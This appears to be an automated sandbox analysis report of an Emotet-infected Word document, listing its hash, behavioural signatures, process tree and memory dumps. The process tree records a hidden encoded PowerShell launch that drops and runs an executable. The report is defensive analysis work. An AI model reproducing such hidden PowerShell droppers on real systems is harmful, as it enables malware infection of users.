Analysis

  • max time kernel
    149s
  • resource
    win7v191014
  • submitted
    10-12-2019 18:05

General

  • Target

    Docs_ce0dbbcefdbfa0023395b5e11e31d2a2.70.doc

  • Sample

    191210-a4vmfsf3nn

  • SHA256

    ad99c5c6a1b25fb1aa7e3803d11623a74abb080990d3dfe1e684397b77b019af

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

Extracted

Family

emotet

C2

rsa_pubkey.plain

Signatures

  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Drops file in System32 directory 6 IoCs
  • Modifies registry class 136 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_ce0dbbcefdbfa0023395b5e11e31d2a2.70.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:1064
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en 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
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:564
    • C:\Users\Admin\162.exe
      "C:\Users\Admin\162.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:1412
      • C:\Users\Admin\162.exe
        --fb74438b
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:324
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "170567490699066284820195978591905946548-1324181297-6827939461883015892416655494"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:756
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:900
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:1976
      • C:\Windows\SysWOW64\defsensor.exe
        "C:\Windows\SysWOW64\defsensor.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:536
        • C:\Windows\SysWOW64\defsensor.exe
          --b48ef655
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Drops file in System32 directory
          • Suspicious use of SetWindowsHookEx
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          PID:1816

Network

MITRE ATT&CK Enterprise v6


Downloads

  • memory/324-10-0x0000000000400000-0x000000000047C000-memory.dmp (Filesize: 496KB)
  • memory/324-9-0x0000000000240000-0x0000000000257000-memory.dmp (Filesize: 92KB)
  • memory/1064-3-0x0000000006661000-0x0000000006665000-memory.dmp (Filesize: 16KB)
  • memory/1064-0-0x0000000006540000-0x0000000006544000-memory.dmp (Filesize: 16KB)
  • memory/1064-2-0x0000000009150000-0x0000000009154000-memory.dmp (Filesize: 16KB)
  • memory/1064-1-0x0000000006661000-0x0000000006665000-memory.dmp (Filesize: 16KB)
  • memory/1412-6-0x00000000003E0000-0x00000000003F7000-memory.dmp (Filesize: 92KB)
  • memory/1816-14-0x0000000000300000-0x0000000000317000-memory.dmp (Filesize: 92KB)
  • memory/1816-15-0x0000000000400000-0x000000000047C000-memory.dmp (Filesize: 496KB)